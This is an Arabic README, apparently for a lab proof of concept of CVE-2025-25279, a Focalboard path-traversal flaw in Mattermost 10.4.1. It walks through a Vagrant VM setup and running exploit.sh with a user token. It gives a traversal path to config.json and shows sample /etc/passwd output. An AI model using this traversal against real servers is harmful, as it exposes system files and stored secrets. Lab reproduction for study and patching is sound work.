
إثبات مفهوم لاستغلال CVE-2025-25279، وهي ثغرة اجتياز المسار في وحدة Focalboard الخاصة بـ Mattermost 10.4.1، مما يتيح تسريب ملفات عشوائية للمستخدمين المصادق عليهم عبر مرفقات مصممة.
تُظهر هذه الإثبات العملي استغلال الثغرة CVE-2025-25279 التي تؤثر على Mattermost 10.4.1.
يسمح وجود خلل في Focalboard (وحدة إدارة اللوحات) بـ قراءة عشوائية للملفات عبر تجاوز المسار في المرفقات.
يُمكّن الاستغلال من استخراج:
/etc/passwd/etc/groupopt/mattermost/config/config.jsonيعمل الهجوم فقط باستخدام حساب مستخدم مُصادق عليه في السيناريوهات الضعيفة.
المجلد target/ غير مضمن (كبير جدًا لـ GitHub).
حمّله يدويًا من: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
أولاً، اذهب إلى دليل target ونفّذ:
cd target
make mattermost.box
تأكد من وجود box mattermost-poc وإلا لن يعمل الجهاز الافتراضي:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
الاتصال بالجهاز الافتراضي
vagrant ssh
افتح: http://localhost:8065
الملف الشخصي --> الأمان --> رموز الوصول الشخصية
من الجهاز المضيف:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
سيُطلب منك:
PAT (Personal Access Token) :
👉 أدخل رمز PAT صالحًا لمستخدم Mattermost.
📸 مثال على المخرجات (استخراج /etc/passwd)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
الملف المستهدف: config.json
لاستهداف ملف Mattermost حساس:
عدّل في أعلى السكربت exploit.sh:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
سيعرض الاستغلال بعد ذلك محتوى ملف config.json.
🟢 محمد موسى أبو بكر 🔵 سيريل بارنيه
🎬 عرض فيديو
👉 يوجد عرض توضيحي كامل بالفيديو في: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 ملاحظات
هذا الإثبات العملي مخصص فقط لبيئات التعلم. لا يُستخدم أبدًا خارج الإطار التعليمي أو بدون إذن.